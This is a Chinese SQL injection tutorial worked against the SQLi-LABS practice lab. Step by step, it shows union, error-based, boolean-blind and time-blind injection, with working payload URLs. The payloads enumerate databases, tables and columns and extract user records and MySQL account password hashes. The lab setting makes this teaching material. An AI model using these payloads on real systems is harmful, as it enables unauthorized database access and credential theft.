手工注入获取数据加深各种注入类型漏洞的理解

1.联合查询

环境 SQLi-LABS/Less-1

1.1检测注入

http://192.168.1.10:9999/Less-1?id=1'
http://192.168.1.10:9999/Less-1?id=1'--+
#单引号报错加 ,加--+ 不报错
http://192.168.1.10:9999/Less-1?id=1' and 1=1 --+
http://192.168.1.10:9999/Less-1?id=1' and 1=2 --+
#1=1 返回user,1=2不返回数据

1.2检测当前查询语句的字段数

http://192.168.1.10:9999/Less-1?id=1' and 1=1 order by 3 --+
http://192.168.1.10:9999/Less-1?id=1' and 1=1 order by 4 --+
#order by 3 正常,order by 4报错,说明有3个字段

1.3检测显示位置

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,3 --+
#联合查询前面的查询为false,显示后面的数据,2,3出现在网页上

1.4获取数据库的信息

数据库版本与当前数据库名称

http://192.168.1.10:9999/Less-1/?id=1'  and 1=2 union select 1,version(),database() --+

mysql server一共有多少个库

http://192.168.1.10:9999/Less-1/?id=1'  and 1=2  union SELECT 1,2,count(schema_name) from information_schema.schemata --+

获取数据名称

#分别获取每一个库的名称
http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 0,1--+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 1,1--+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 2,1--+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 3,1--+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2  union SELECT null,null,schema_name from information_schema.schemata limit 4,1--+

#一次查询出所有库的名称
http://192.168.1.10:9999/Less-1/?id=1'  and 1=2  union SELECT 1,2,group_concat(schema_name) from information_schema.schemata --+

1.5获取表的信息

#当前数据库一共有多少个表
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,count(table_name) from information_schema.tables where table_schema = database() --+

#分别获取当前库每个表的名称
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = database() limit 0,1 --+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = database() limit 1,1 --+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = database() limit 2,1 --+

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = database() limit 3,1 --+

#一次获取当前库所有表名
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema = database() --+

##database() 换做其他库名即可获取其他库的表信息

1.6获取列信息

#获取当前库 users表有多少列
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, count(column_name) from information_schema.columns where table_schema = database() and table_name ='users'--+

#分别获取每一列的名称
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, column_name from information_schema.columns where table_schema = database() and table_name ='users' limit 0,1--+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, column_name from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1--+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, column_name from information_schema.columns where table_schema = database() and table_name ='users' limit 2,1--+
#一次获取所有列的名称
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema = database() and table_name ='users'--+

1.7获取表数据

获取一共有多少条数据

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, count(concat_ws('---',id,username,password)) from security.users  --+

分别获取每一条数据

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 0,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 1,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 2,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 3,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 4,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 5,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 6,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 7,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 8,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 9,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 10,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 11,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, concat_ws('---',id,username,password) from security.users limit 12,1 --+

一次获取所有数据

http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, group_concat( concat_ws('---',id,username,password)) from security.users --+

1.8获取mysql-user信息

#一共有多少个用户
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2, count(concat_ws('---',host,user,Password)) from `mysql`.user --+
#分别获取每一个用户
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,concat_ws('---',host,user,Password) from `mysql`.user limit 0,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,concat_ws('---',host,user,Password) from `mysql`.user limit 1,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,concat_ws('---',host,user,Password) from `mysql`.user limit 2,1 --+
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,concat_ws('---',host,user,Password) from `mysql`.user limit 3,1 --+
#一次获取所有用户
http://192.168.1.10:9999/Less-1/?id=1' and 1=2 union select 1,2,group_concat(concat_ws('---',host,user,Password)) from `mysql`.user limit 0,1 --+

2.报错注入

报错注入常见的10个函数及用法,将payload替换为对应sql语句可获取相应信息

#floor()
 (select 1 from (select count(*),concat(payload,floor(rand(0)*2))x from information_schema.tables group by x)a) 

#multilinestring()
multilinestring((select * from(select * from(select payload)a)b))

#extractvalue()
(extractvalue(1,concat(0x7e,(select payload),0x7e)))

#linestring()
linestring((select * from(select * from(select payload))a)b))

#updatexml()
 (updatexml(1,concat(0x7e,(select payload),0x7e),1))

#exp()
exp(~(select * from(select payload)a))

#geometrycollection()
geometrycollection((select * from(select * from(select payload)a)b))

#multipoint()
multipoint((select * from(select * from(select payload)a)b))

#polygon()
polygon((select * from(select * from(select payload)a)b))

#multipolygon()
 multipolygon((select * from(select * from(select payload)a)b))

环境 SQLi-LABS/Less-5

2.1检测注入

http://192.168.1.10:9999/Less-5/?id=1'
http://192.168.1.10:9999/Less-5/?id=1' and 1=1--+
http://192.168.1.10:9999/Less-5/?id=1' and 1=2--+
单引号报错,1=1 有返回,1=2没有返回,前端不显示查询的数据,存在报错注入

2.2获取数据库的信息

#获取数据库版本
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select version())," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

#获取当前数据库名称
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select database())," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

#mysql server一共有多少个数据库
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select count(schema_name) from information_schema.schemata)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+
#获取每一个数据库的名称
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 2,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 3,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 4,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2.3获取表的信息

  1. 获取当前库表的总数
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select count(table_name) from information_schema.tables where table_schema = 'security')," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+
  1. 获取当前库的所有表名
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 2,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 3,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2.4获取列信息

  1. 获取列字段总数
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select count(column_name) FROM  information_schema.columns where table_schema = 'security' and TABLE_NAME ='emails')," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+
  1. 获取列每个字段名称
#获取第一个字段名称
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select column_name FROM  information_schema.columns where table_schema = 'security' and TABLE_NAME ='emails' limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

#获取第二个字段名称
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select column_name FROM  information_schema.columns where table_schema = 'security' and TABLE_NAME ='emails' limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2.5获取表数据

  1. 获取表一共有多少条数据
http://192.168.1.10:9999/Less-1/?id=-1' union select 1,2,count(concat_ws('---',id,email_id)) from `security`.emails --+
  1. 获取每一条数据
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 2,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 3,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 4,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 5,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 6,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',id,email_id) from security.emails limit 7,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2.6获取mysql user信息

  1. 获取总的用户数
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select count((concat_ws('---',host,user,Password))) from `mysql`.user)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+
  1. 获取每一个用户的信息
http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',host,user,Password) from `mysql`.user limit 0,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',host,user,Password) from `mysql`.user limit 1,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',host,user,Password) from `mysql`.user limit 2,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

http://192.168.1.10:9999/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat_ws('---',host,user,Password) from `mysql`.user limit 3,1)," ",floor(rand(0)*2))x from information_schema.tables group by x)a) --+

3.布尔盲注

环境 SQLi-LABS/Less-8

3.1检测注入

http://192.168.1.10:9999/Less-8/?id=1'  
http://192.168.1.10:9999/Less-8/?id=1' and 1=1--+
http://192.168.1.10:9999/Less-8/?id=1' and 1=2--+
#1=1有返回信息,1=2没有返回,前端不显示查询的数据,存在盲注

3.2猜数据库信息

猜当前数据库名有多长

http://192.168.1.10:9999/Less-8/?id=2' and (length(database())=8) --+

猜当前数据库名

依次猜每个字符的ascc码
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),1,1))) =115  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),2,1))) =101  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),3,1))) =99  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),4,1))) =117  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),5,1))) =114  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),6,1))) =105  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),7,1))) =116  --+
http://192.168.1.10:9999/Less-8/?id=1' and (ascii(mid(database(),8,1))) =121  --+

3.3猜表的信息

猜当前库一共有多少个表

http://192.168.1.10:9999/Less-8/?id=1'  and (select count(table_name) from information_schema.tables where table_schema = 'security') =4 --+

猜每一个表的长度


http://192.168.1.10:9999/Less-8/?id=1' and (select length(table_name) from  information_schema.tables where table_schema = 'security' limit 0,1) =6 

http://192.168.1.10:9999/Less-8/?id=1' and (select length(table_name) from  information_schema.tables where table_schema = 'security' limit 1,1) =8 --+ 

http://192.168.1.10:9999/Less-8/?id=1' and (select length(table_name) from  information_schema.tables where table_schema = 'security' limit 2,1) =7 --+
http://192.168.1.10:9999/Less-8/?id=1' and (select length(table_name) from  information_schema.tables where table_schema = 'security' limit 3,1) =5 --+

猜表名

依次猜每个字符的ascc码
http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,1,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =101 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,2,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =109 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,3,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =97 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,4,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =105 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,5,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =108 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(table_name,6,1)) from  information_schema.tables where table_schema = 'security' limit 0,1) =115 --+
emails

3.4猜列的信息

猜有几列

http://192.168.1.10:9999/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'emails' ) =2 --+

猜列名长度

#第一列名称的长度
http://192.168.1.10:9999/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'emails' limit 0,1) =2 --+
#第二列名称的长度
http://192.168.1.10:9999/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'emails' limit 1,1) =8 --+

猜列名

#第一列名称第一个字符的assic码
http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(column_name,1,1)) from information_schema.columns where table_schema = 'security' and table_name = 'emails' limit 0,1) =105 --+
#第一列名称第二个字符的assic码
http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid(column_name,2,1)) from information_schema.columns where table_schema = 'security' and table_name = 'emails' limit 0,1) =100 --+

3.5猜数据

猜一共有几列数据

判断一共有多少列数据
http://192.168.1.10:9999/Less-8/?id=1' and ( select count(concat_ws('-',id,email_id)) from security.emails) = 8 --+

判断第一列数据的长度

http://192.168.1.10:9999/Less-8/?id=1' and ( select length(concat_ws('-',id,email_id)) from security.emails limit 0,1) =18 --+

猜列的内容

判断第一列数据第一个字符的ascii码 
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),1,1)) from security.emails limit 0,1) =49  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),2,1)) from security.emails limit 0,1) =45  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),3,1)) from security.emails limit 0,1) =68  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),4,1)) from security.emails limit 0,1) =117  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),5,1)) from security.emails limit 0,1) =109  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),6,1)) from security.emails limit 0,1) =98  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),7,1)) from security.emails limit 0,1) =64  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),8,1)) from security.emails limit 0,1) =100  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),9,1)) from security.emails limit 0,1) =104  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),10,1)) from security.emails limit 0,1) =97  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),11,1)) from security.emails limit 0,1) =107  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),12,1)) from security.emails limit 0,1) =107  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),13,1)) from security.emails limit 0,1) =97  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),14,1)) from security.emails limit 0,1) =110  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),15,1)) from security.emails limit 0,1) =46  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),16,1)) from security.emails limit 0,1) =99  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),17,1)) from security.emails limit 0,1) =111  --+
http://192.168.1.10:9999/Less-8/?id=1' and ( select ascii(mid(concat_ws('-',id,email_id),18,1)) from security.emails limit 0,1) =109  --+

3.6猜mysql user信息

猜一共有多少个用户

http://192.168.1.10:9999/Less-8/?id=1' and (select count(concat_ws('---',host,user,Password)) from `mysql`.user) = 4 --+

猜获取的第一列用户数据的长度

http://192.168.1.10:9999/Less-8/?id=1' and (select length(concat_ws('-',host,user,Password)) from `mysql`.user limit 0,1) =15 --+

猜第一列用户数据的ascii码

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),1,1)) from `mysql`.user limit 0,1)=108 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),2,1)) from `mysql`.user limit 0,1)=111 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),3,1)) from `mysql`.user limit 0,1)=99 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),4,1)) from `mysql`.user limit 0,1)=97 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),5,1)) from `mysql`.user limit 0,1)=108 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),6,1)) from `mysql`.user limit 0,1)=104 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),7,1)) from `mysql`.user limit 0,1)=111 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),8,1)) from `mysql`.user limit 0,1)=115 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),9,1)) from `mysql`.user limit 0,1)=116 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),10,1)) from `mysql`.user limit 0,1)=45 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),11,1)) from `mysql`.user limit 0,1)=114 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),12,1)) from `mysql`.user limit 0,1)=111 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),13,1)) from `mysql`.user limit 0,1)=111 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),14,1)) from `mysql`.user limit 0,1)=116 --+

http://192.168.1.10:9999/Less-8/?id=1' and (select ascii(mid((concat_ws('-',host,user,Password)),15,1)) from `mysql`.user limit 0,1)=45 --+

4.时间盲注

环境 SQLi-LABS/Less-9

4.1检测注入

http://192.168.1.10:9999/Less-9/?id=1'
http://192.168.1.10:9999/Less-9/?id=1' --+
http://192.168.1.10:9999/Less-9/?id=1' and 1=1 --+
http://192.168.1.10:9999/Less-9/?id=1' and 1=2 --+
http://192.168.1.10:9999/Less-9/?id=1' and sleep(5)--+
#无论输入什么都返回一样的页面, and sleep(5) 页面延迟5秒返回--时间盲注

4.2猜数据库信息

  1. 猜当前数据库名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((length(database()))=8,sleep(5),1)--+
  1. 猜当前数据库名
猜第一个字符的ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((ascii(mid(database(),1,1)))>110,sleep(5),1)--+

4.3猜表信息

猜当前数据库一共有多少个表

http://192.168.1.10:9999/Less-9/?id=1' and if((select count(table_name) from information_schema.tables where table_schema = database())=4,sleep(5),1)--+

猜表名的长度

第一个表名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)=6,sleep(5),1)--+
第二个表名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)=8,sleep(5),1)--+
第三个表名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema = database() limit 2,1)=7,sleep(5),1)--+
第四个表名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema = database() limit 3,1)=5,sleep(5),1)--+

猜表名

第四张表名
第一个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),1,1)) from information_schema.tables where table_schema = database() limit 3,1)=117,sleep(5),1)--+
第二个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),2,1)) from information_schema.tables where table_schema = database() limit 3,1)=115,sleep(5),1)--+
第三个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),3,1)) from information_schema.tables where table_schema = database() limit 3,1)=101,sleep(5),1)--+
第四个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),4,1)) from information_schema.tables where table_schema = database() limit 3,1)=114,sleep(5),1)--+
第五个字符ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((table_name),5,1)) from information_schema.tables where table_schema = database() limit 3,1)=115,sleep(5),1)--+

4.4猜列的信息

猜表的列数

http://192.168.1.10:9999/Less-9/?id=1' and if((select count(column_name) from information_schema.columns where table_schema = database() and table_name ='users')=3,sleep(5),1)--+

猜列名的长度

第一列名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(column_name) from information_schema.columns where table_schema = database() and table_name ='users' limit 0,1)=2,sleep(5),1)--+
第二列名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(column_name) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=8,sleep(5),1)--+
第三列名长度
http://192.168.1.10:9999/Less-9/?id=1' and if((select length(column_name) from information_schema.columns where table_schema = database() and table_name ='users' limit 2,1)=8,sleep(5),1)--+

猜列名

第一列名称的ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),1,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 0,1)=105,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),2,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 0,1)=100,sleep(5),1)--+

第二列名称的ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),1,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=117,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),2,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=115,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),3,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=101,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),4,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=114,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),5,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=110,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),6,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=97,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),7,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=109,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid((column_name),8,1)) from information_schema.columns where table_schema = database() and table_name ='users' limit 1,1)=101,sleep(5),1)--+

4.5猜数据

猜一共有多少条数据

http://192.168.1.10:9999/Less-9/?id=1' and if(( select count(concat_ws('-',id,username,password)) from security.users)=13,sleep(5),1)--+

猜第一条数据的长度

http://192.168.1.10:9999/Less-9/?id=1' and if(( select length(concat_ws('-',id,username,password)) from security.users limit 0,1)=11,sleep(5),1)--+

猜内容

猜第一条数据的第一个字符的ascii码
http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),1,1)) from security.users limit 0,1)=49,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),2,1)) from security.users limit 0,1)=45,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),3,1)) from security.users limit 0,1)=68,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),4,1)) from security.users limit 0,1)=117,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),5,1)) from security.users limit 0,1)=109,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),6,1)) from security.users limit 0,1)=98,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),7,1)) from security.users limit 0,1)=45,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),8,1)) from security.users limit 0,1)=68,sleep(5),1)--+

http://192.168.1.10:9999/Less-9/?id=1' and if((select ascii(mid(concat_ws('-',id,username,password),9,1)) from security.users limit 0,1)=117,sleep(5),1)--+

